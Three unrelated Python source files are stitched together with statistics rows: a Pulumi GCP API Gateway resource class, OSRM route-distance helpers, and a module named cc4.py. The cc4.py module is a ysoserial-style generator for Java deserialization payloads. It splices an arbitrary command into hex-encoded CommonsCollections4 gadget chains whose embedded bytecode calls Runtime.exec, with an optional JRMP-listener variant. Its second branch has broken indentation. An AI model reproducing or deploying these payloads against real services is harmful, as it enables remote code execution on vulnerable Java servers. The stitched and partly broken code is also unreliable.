'gcp:apigateway/api:Api',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
api_id: Optional[pulumi.Input[str]] = None,
create_time: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
managed_service: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None) -> 'Api':
"""
Get an existing Api resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] api_id: Identifier to assign to the API. Must be unique within the scope of the parent resource (project)
:param pulumi.Input[str] create_time: Creation timestamp in RFC3339 text format.
:param pulumi.Input[str] display_name: A user-visible name for the API.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Resource labels to represent user-provided metadata.
        :param pulumi.Input[str] managed_service: Immutable. The name of a Google Managed Service (https://cloud.google.com/service-infrastructure/docs/glossary#managed).
               If not specified, a new Service will automatically be created in the same project as this API.
:param pulumi.Input[str] name: The resource name of the API. Format 'projects/{{project}}/locations/global/apis/{{apiId}}'
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ApiState.__new__(_ApiState)
__props__.__dict__["api_id"] = api_id
__props__.__dict__["create_time"] = create_time
__props__.__dict__["display_name"] = display_name
__props__.__dict__["labels"] = labels
__props__.__dict__["managed_service"] = managed_service
__props__.__dict__["name"] = name
__props__.__dict__["project"] = project
return Api(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="apiId")
def api_id(self) -> pulumi.Output[str]:
"""
        Identifier to assign to the API. Must be unique within the scope of the parent resource (project)
"""
return pulumi.get(self, "api_id")
@property
@pulumi.getter(name="createTime")
def create_time(self) -> pulumi.Output[str]:
"""
Creation timestamp in RFC3339 text format.
"""
return pulumi.get(self, "create_time")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
A user-visible name for the API.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter
def labels(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource labels to represent user-provided metadata.
"""
return pulumi.get(self, "labels")
@property
@pulumi.getter(name="managedService")
def managed_service(self) -> pulumi.Output[str]:
"""
        Immutable. The name of a Google Managed Service (https://cloud.google.com/service-infrastructure/docs/glossary#managed).
        If not specified, a new Service will automatically be created in the same project as this API.
"""
return pulumi.get(self, "managed_service")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The resource name of the API. Format 'projects/{{project}}/locations/global/apis/{{apiId}}'
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
| 41.790698 | 171 | 0.634188 | 2,417 | 19,767 | 5.009516 | 0.083575 | 0.085398 | 0.091345 | 0.074496 | 0.861992 | 0.838619 | 0.825405 | 0.816733 | 0.804675 | 0.784688 | 0 | 0.001293 | 0.25669 | 19,767 | 472 | 172 | 41.879237 | 0.822773 | 0.389589 | 0 | 0.700422 | 1 | 0 | 0.078023 | 0.002043 | 0 | 0 | 0 | 0 | 0 | 1 | 0.160338 | false | 0.004219 | 0.021097 | 0 | 0.278481 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7af8890041f34912d89275698ee7f60146c88aad | 17,084 | py | Python | src/pyyso/yso/cc4.py | cokeBeer/pyyso | c29171a5d2aea0d0c524fec4d8d6d0a1084f659f | [
"MIT"
] | 2 | 2022-03-18T15:17:25.000Z | 2022-03-19T05:21:30.000Z | src/pyyso/yso/cc4.py | cokeBeer/pyyso | c29171a5d2aea0d0c524fec4d8d6d0a1084f659f | [
"MIT"
] | null | null | null | src/pyyso/yso/cc4.py | cokeBeer/pyyso | c29171a5d2aea0d0c524fec4d8d6d0a1084f659f | [
"MIT"
] | null | null | null | def cc4(cmd: str, jrmp: bool = True) -> bytes:
if jrmp:
prefix = "51aced0005770f02628afa5d00000180c6de517480017372002e6a617661782e6d616e6167656d656e742e42616441747472696275746556616c7565457870457863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176612f6c616e672f4f626a6563743b70787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc402000070787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573736167657400124c6a6176612f6c616e672f537472696e673b5b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b70787071007e0008707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd2239020000707870000000047372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00054c000866696c654e616d6571007e00054c000a6d6574686f644e616d6571007e00057078700000011b74001e79736f73657269616c2e6578706c6f69742e4a524d504c697374656e65727400114a524d504c697374656e65722e6a617661740006646f43616c6c7371007e000b000000e071007e000d71007e000e740009646f4d6573736167657371007e000b000000ab71007e000d71007e000e74000372756e7371007e000b0000007771007e000d71007e000e7400046d61696e737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e0007707872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b707870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a65707870000000007704000000007871007e001b78737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b70787000000002737200426f72672e6170616368652e636f6d6d6f6e732e63
6f6c6c656374696f6e73342e636f6d70617261746f72732e5472616e73666f726d696e67436f6d70617261746f722ff984f02bb108cc0200024c00096465636f726174656471007e001d4c000b7472616e73666f726d657274002d4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e73342f5472616e73666f726d65723b74001966696c653a2f707269766174652f746d702f79736f2e6a61727870737200406f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e73342e636f6d70617261746f72732e436f6d70617261626c65436f6d70617261746f72fbf49925b86eb13702000074001966696c653a2f707269766174652f746d702f79736f2e6a617278707372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e73342e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002e5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e73342f5472616e73666f726d65723b74001966696c653a2f707269766174652f746d702f79736f2e6a617278707572002e5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e73342e5472616e73666f726d65723b39813afb08da3fa502000074001966696c653a2f707269766174652f746d702f79736f2e6a61727870000000027372003c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e73342e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e000174001966696c653a2f707269766174652f746d702f79736f2e6a6172787076720037636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e5472415846696c74657200000000000000000000007078707372003f6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e73342e66756e63746f72732e496e7374616e74696174655472616e73666f726d6572348bf47fa486d03b0200025b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b74001966696c653a2f707269766174652f746d702f79736f2e6a61727870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c020000707870000000017372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d
706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c61737371007e00344c00055f6e616d6571007e00054c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b70787000000000ffffffff757200035b5b424bfd19156767db3702000070787000000002757200025b42acf317f8060854e0020000707870"
midfix = "cafebabe0000003200390a0003002207003707002507002601001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c756505ad2093f391ddef3e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010013537475625472616e736c65745061796c6f616401000c496e6e6572436c61737365730100354c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e736c65745061796c6f61643b0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074696f6e730700270100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07002801003379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e736c65745061796c6f6164010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100146a617661
2f696f2f53657269616c697a61626c65010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e01001f79736f73657269616c2f7061796c6f6164732f7574696c2f476164676574730100083c636c696e69743e0100116a6176612f6c616e672f52756e74696d6507002a01000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b0c002c002d0a002b002e01"
postfix = "08003001000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0c003200330a002b003401000d537461636b4d61705461626c6501001e79736f73657269616c2f50776e65723233323638333730383139333733390100204c79736f73657269616c2f50776e65723233323638333730383139333733393b002100020003000100040001001a000500060001000700000002000800040001000a000b0001000c0000002f00010001000000052ab70001b100000002000d0000000600010000002f000e0000000c000100000005000f003800000001001300140002000c0000003f0000000300000001b100000002000d00000006000100000034000e00000020000300000001000f0038000000000001001500160001000000010017001800020019000000040001001a00010013001b0002000c000000490000000400000001b100000002000d00000006000100000038000e0000002a000400000001000f003800000000000100150016000100000001001c001d000200000001001e001f00030019000000040001001a00080029000b0001000c00000024000300020000000fa70003014cb8002f1231b6003557b1000000010036000000030001030002002000000002002100110000000a000100020023001000097571007e003f000001d4cafebabe00000032001b0a0003001507001707001807001901001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75650571e669ee3c6d47180100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010003466f6f01000c496e6e6572436c61737365730100254c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f3b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07001a01002379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f0100106a6176612f6c616e672f4f626a6563740100146a6176612f696f2f53657269616c697a61626c6501001f79736f73657269616c2f7061796c6f6164732f7574696c2f47616467657473002100020003000100040001001a000500060001000700000002000800010001000a000b0001000c0000002f00010001000000052ab70001b100000002000d0000000600010000003c000e0000000c000100000005000f001200000002001300000002001400110000000a000100020016001000097074000450776e727077010078757200125b4c6
a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000707870000000017672001d6a617661782e786d6c2e7472616e73666f726d2e54656d706c617465730000000000000000000000707870770400000003737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c756570787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007078700000000171007e004978"
        # 4-byte big-endian length of the embedded class file (fixed base plus command bytes)
        length = (0x696 + len(cmd)).to_bytes(4, byteorder='big').hex()
        # 2-byte big-endian length of the command's UTF-8 string constant
        length2 = len(cmd).to_bytes(2, byteorder='big').hex()
        hexdata = prefix + length + midfix + length2 + cmd.encode().hex() + postfix
        data = bytes.fromhex(hexdata)
        return data
prefix = "aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b787000000002737200426f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e73342e636f6d70617261746f72732e5472616e73666f726d696e67436f6d70617261746f722ff984f02bb108cc0200024c00096465636f726174656471007e00014c000b7472616e73666f726d657274002d4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e73342f5472616e73666f726d65723b7870737200406f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e73342e636f6d70617261746f72732e436f6d70617261626c65436f6d70617261746f72fbf49925b86eb13702000078707372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e73342e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002e5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e73342f5472616e73666f726d65723b78707572002e5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e73342e5472616e73666f726d65723b39813afb08da3fa50200007870000000027372003c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e73342e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b787076720037636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e5472415846696c746572000000000000000000000078707372003f6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e73342e66756e63746f72732e496e7374616e74696174655472616e73666f726d6572348bf47fa486d03b0200025b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870000000017372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000949000d5f696e64656e744e
756d62657249000e5f7472616e736c6574496e6465785a00155f75736553657276696365734d656368616e69736d4c00195f61636365737345787465726e616c5374796c6573686565747400124c6a6176612f6c616e672f537472696e673b4c000b5f617578436c617373657374003b4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f486173687461626c653b5b000a5f62797465636f6465737400035b5b425b00065f636c61737371007e00144c00055f6e616d6571007e00194c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff00740003616c6c70757200035b5b424bfd19156767db37020000787000000002757200025b42acf317f8060854e00200007870"
midfix = "cafebabe00000034003907003701002e636f6d6d6f6e342f436f6d6d6f6e436f6c6c656374696f6e733424537475625472616e736c65745061796c6f6164070004010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c65740700060100146a6176612f696f2f53657269616c697a61626c6501001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c756505ad2093f391ddef3e0100063c696e69743e010003282956010004436f64650a000300100c000c000d01000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100304c636f6d6d6f6e342f436f6d6d6f6e436f6c6c656374696f6e733424537475625472616e736c65745061796c6f61643b0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b295601000a457863657074696f6e73070019010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0100
0a536f7572636546696c65010010436f6d6d6f6e34746573742e6a61766101000c496e6e6572436c617373657307002701001a636f6d6d6f6e342f436f6d6d6f6e436f6c6c656374696f6e7334010013537475625472616e736c65745061796c6f61640100083c636c696e69743e0100116a6176612f6c616e672f52756e74696d6507002a01000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b0c002c002d0a002b002e01"
postfix = "08003001000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0c003200330a002b003401000d537461636b4d61705461626c6501001d79736f73657269616c2f50776e6572343330343335363631323736373601001f4c79736f73657269616c2f50776e657234333034333536363132373637363b002100010003000100050001001a000700080001000900000002000a00040001000c000d0001000e0000002f00010001000000052ab7000fb10000000200110000000600010000007d00120000000c000100000005001300380000000100150016000200170000000400010018000e0000003f0000000300000001b10000000200110000000600010000008200120000002000030000000100130038000000000001001a001b000100000001001c001d000200010015001e000200170000000400010018000e000000490000000400000001b10000000200110000000600010000008600120000002a00040000000100130038000000000001001a001b000100000001001f002000020000000100210022000300080029000d0001000e00000024000300020000000fa70003014cb8002f1231b6003557b1000000010036000000030001030002002300000002002400250000000a000100010026002800097571007e0021000001c9cafebabe00000034001b07000201001e636f6d6d6f6e342f436f6d6d6f6e436f6c6c656374696f6e733424466f6f0700040100106a6176612f6c616e672f4f626a6563740700060100146a6176612f696f2f53657269616c697a61626c6501001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75650571e669ee3c6d47180100063c696e69743e010003282956010004436f64650a000300100c000c000d01000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100204c636f6d6d6f6e342f436f6d6d6f6e436f6c6c656374696f6e733424466f6f3b01000a536f7572636546696c65010010436f6d6d6f6e34746573742e6a61766101000c496e6e6572436c617373657307001901001a636f6d6d6f6e342f436f6d6d6f6e436f6c6c656374696f6e7334010003466f6f002100010003000100050001001a000700080001000900000002000a00010001000c000d0001000e0000002f00010001000000052ab7000fb10000000200110000000600010000007600120000000c0001000000050013001400000002001500000002001600170000000a000100010018001a00097074000450776e727077010078757200125b4c6a6176612e6c616e672e436c617
3733bab16d7aecbcd5a990200007870000000017672001d6a617661782e786d6c2e7472616e73666f726d2e54656d706c6174657300000000000000000000007870770400000003737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b02000078700000000171007e002b78"
length = (0x689 + len(cmd)).to_bytes(4, byteorder='big').hex()  # 4-byte big-endian prefix: fixed base payload size plus command length
length2 = len(cmd).to_bytes(2, byteorder='big').hex()  # 2-byte big-endian prefix: command length alone
hexdata = prefix + length + midfix + length2 + cmd.encode().hex() + postfix
data = bytes.fromhex(hexdata)
return data
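The two length prefixes built above are plain big-endian byte counts rendered as hex. A standalone sketch of that arithmetic (the `cmd` value here is a hypothetical placeholder; `0x689` is the fixed base size taken from the code above):

```python
cmd = "id"  # hypothetical command string

# 4-byte big-endian prefix: fixed base payload size plus command length
length = (0x689 + len(cmd)).to_bytes(4, byteorder="big").hex()

# 2-byte big-endian prefix: command length alone
length2 = len(cmd).to_bytes(2, byteorder="big").hex()

print(length)   # "0000068b"
print(length2)  # "0002"
```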
| 899.157895 | 4,411 | 0.982264 | 90 | 17,084 | 186.411111 | 0.377778 | 0.001431 | 0.001907 | 0.003099 | 0.017762 | 0.017762 | 0.017762 | 0.017762 | 0.017762 | 0.017762 | 0 | 0.818214 | 0.010829 | 17,084 | 18 | 4,412 | 949.111111 | 0.174567 | 0 | 0 | 0.444444 | 0 | 0 | 0.959728 | 0.959026 | 0 | 1 | 0.000585 | 0 | 0 | 1 | 0.055556 | false | 0 | 0 | 0 | 0.166667 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
bb14f2bc1a3530bd55d5a7fc4c81902e0babcb46 | 7,466 | py | Python | my_function_osrm.py | SiitESTGL/SIIT | 7c67c6b0ff2a0aab423ae9393eef618b5060c281 | [
"MIT"
] | null | null | null | my_function_osrm.py | SiitESTGL/SIIT | 7c67c6b0ff2a0aab423ae9393eef618b5060c281 | [
"MIT"
] | null | null | null | my_function_osrm.py | SiitESTGL/SIIT | 7c67c6b0ff2a0aab423ae9393eef618b5060c281 | [
"MIT"
] | null | null | null | __author__ = 'Jesus'
from python_osrm.osrm import *
from models import POIS
from app_core import app
RequestConfig.host = app.config['OSRM_DRIVE_ADDRESS'] # mode driving using default config.
myconfig_bicyling = RequestConfig(app.config['OSRM_BIKE_ADDRESS']) # service for mode bicyling
myconfig_walking = RequestConfig(app.config['OSRM_WALK_ADDRESS']) # service for mode walking
def get_trip_distance_duration(origin, destin):
"""
Return trip distance and duration between two pois, by default mode of travel is driving
"""
coord_start = [float(item) for item in origin]
coord_finish = [float(item) for item in destin]
distance = 0.0
duration = 0.0
r = simple_route(coord_start,coord_finish)
if r:
info_route = r['routes']
for item in info_route:
distance = item.get('distance')
duration = item.get('duration')
return (distance,duration)
def get_trip_driving(origin, destin):
"""
Return trip data between two pois, by default mode of travel is driving
"""
coord_start = [float(item) for item in origin]
coord_finish = [float(item) for item in destin]
distance = 0.0
duration = 0.0
r = simple_route(coord_start,coord_finish)
if r:
info_route = r['routes']
for item in info_route:
distance = item.get('distance')
duration = item.get('duration')
geometry = item.get('geometry')
return (distance,duration,geometry)
def get_trip_distance_duration_walk(origin, destin):
"""
Return trip distance and duration between two pois, by default mode of travel is walking
"""
myconfig_walking = RequestConfig(app.config['OSRM_WALK_ADDRESS']) # service for mode walking
coord_start = [float(item) for item in origin]
coord_finish = [float(item) for item in destin]
distance = 0.0
duration = 0.0
r = simple_route(coord_start,coord_finish, url_config = myconfig_walking)
if r:
info_route = r['routes']
for item in info_route:
distance = item.get('distance')
duration = item.get('duration')
return (distance,duration)
def get_trip_walking(origin, destin):
"""
    Return trip data between two pois, by default mode of travel is walking
"""
myconfig_walking = RequestConfig(app.config['OSRM_WALK_ADDRESS']) # service for mode walking
coord_start = [float(item) for item in origin]
coord_finish = [float(item) for item in destin]
distance = 0.0
duration = 0.0
r = simple_route(coord_start,coord_finish, url_config = myconfig_walking)
if r:
info_route = r['routes']
for item in info_route:
distance = item.get('distance')
duration = item.get('duration')
geometry = item.get('geometry')
return (distance,duration, geometry)
def get_trip_duration(origin, destin):
"""
Return trip duration between two pois, by default mode of travel is driving
    :param origin: coordinate of origin (longitude, latitude)
:param destin: coordinate of destin (longitude, latitude)
"""
coord_start = [float(item) for item in origin]
coord_finish = [float(item) for item in destin]
duration = None
r = simple_route(coord_start,coord_finish)
info_route = r['routes']
for item in info_route:
duration = item.get('duration')
break
return duration
def get_trip_duration2(origin, destin):
"""
Return trip duration between two pois, by default mode of travel is driving
"""
coord_start = [float(item) for item in origin]
coord_finish = [float(item) for item in destin]
duration = 0.0
r = simple_route(coord_start,coord_finish)
if r:
info_route = r['routes']
for item in info_route:
duration = item.get('duration')
return duration
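Every helper above walks the same response shape from `simple_route`: a dict whose `'routes'` list holds entries with `'distance'` and `'duration'` keys, and only the first route matters. A self-contained sketch of that shared parsing against a hand-built stand-in response (no OSRM server assumed):

```python
def parse_first_route(response):
    """Return (distance, duration) from an OSRM-style response dict,
    falling back to (0.0, 0.0) when there is no usable route."""
    distance, duration = 0.0, 0.0
    if response:
        for item in response.get('routes', []):
            distance = item.get('distance')
            duration = item.get('duration')
            break  # only the first route is used, as in the helpers above
    return distance, duration

# Hand-built stand-in for a simple_route() result:
fake = {'routes': [{'distance': 1234.5, 'duration': 600.0}]}
print(parse_first_route(fake))  # (1234.5, 600.0)
```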
def get_route_distances(input_poi_id, modetravel):
"""
:param input_poi_id: poi id list
:param modetravel: car, bicycle or foot
:return: distance
"""
start_poi = POIS.query.get(input_poi_id[0])
    end_poi = POIS.query.get(input_poi_id[-1])
coord_origin = []
coord_destin = []
coord_waypoints = []
route_distance = None
if start_poi:
coord_origin.append(float(start_poi.poi_lon))
coord_origin.append(float(start_poi.poi_lat ))
if end_poi:
coord_destin.append(float(end_poi.poi_lon))
coord_destin.append(float(end_poi.poi_lat ))
for index in range(1, len(input_poi_id)-1):
coord_poi = POIS.query.get(input_poi_id[index])
if coord_poi:
coord_waypoints.append((coord_poi.poi_lon, coord_poi.poi_lat ))
if modetravel == "driving":
info_driving = simple_route(coord_origin,coord_destin,coord_intermediate= coord_waypoints)
info_route = info_driving['routes']
for item in info_route:
route_distance = item.get('distance')
break
elif modetravel == "walking":
info_walking = simple_route(coord_origin,coord_destin,coord_intermediate= coord_waypoints,url_config=myconfig_walking)
info_route = info_walking['routes']
for item in info_route:
route_distance = item.get('distance')
break
elif modetravel == "bicycling":
info_bicycling = simple_route(coord_origin,coord_destin,coord_intermediate= coord_waypoints,url_config=myconfig_bicyling)
info_route = info_bicycling['routes']
for item in info_route:
route_distance = item.get('distance')
break
return route_distance
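The `modetravel` if/elif chain above (repeated again in `get_route_duration`) can be collapsed into a table lookup. A sketch with plain-string stand-ins for the module-level `RequestConfig` objects (`None` standing for the default driving config):

```python
def pick_url_config(modetravel, configs):
    """Map a travel mode to its url_config; raise on unknown modes."""
    if modetravel not in configs:
        raise ValueError("unknown travel mode: %s" % modetravel)
    return configs[modetravel]

# String stand-ins for the RequestConfig objects defined at module level:
CONFIGS = {"driving": None, "walking": "walk-config", "bicycling": "bike-config"}

print(pick_url_config("walking", CONFIGS))  # walk-config
print(pick_url_config("driving", CONFIGS))  # None
```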
def get_route_duration(input_poi_id, modetravel):
"""
:param input_poi_id : poi id list
    :param modetravel: car, bicycle or foot
:return: route duration
"""
# Convert input value to float
start_poi = POIS.query.get(input_poi_id[0])
    end_poi = POIS.query.get(input_poi_id[-1])
coord_origin = []
coord_destin = []
coord_waypoints = []
route_duration = None
if start_poi:
coord_origin.append(float(start_poi.poi_lon))
coord_origin.append(float(start_poi.poi_lat ))
if end_poi:
coord_destin.append(float(end_poi.poi_lon))
coord_destin.append(float(end_poi.poi_lat ))
for index in range(1, len(input_poi_id)-1):
coord_poi = POIS.query.get(input_poi_id[index])
if coord_poi:
coord_waypoints.append((coord_poi.poi_lon, coord_poi.poi_lat ))
if modetravel == "driving":
info_driving = simple_route(coord_origin,coord_destin,coord_intermediate=coord_waypoints)
info_route = info_driving['routes']
for item in info_route:
route_duration = item.get('duration')
break
elif modetravel == "walking":
info_walking = simple_route(coord_origin,coord_destin,coord_intermediate= coord_waypoints,url_config=myconfig_walking)
info_route = info_walking['routes']
for item in info_route:
route_duration = item.get('duration')
break
elif modetravel == "bicycling":
info_bicycling = simple_route(coord_origin,coord_destin,coord_intermediate= coord_waypoints,url_config=myconfig_bicyling)
info_route = info_bicycling['routes']
for item in info_route:
route_duration = item.get('duration')
break
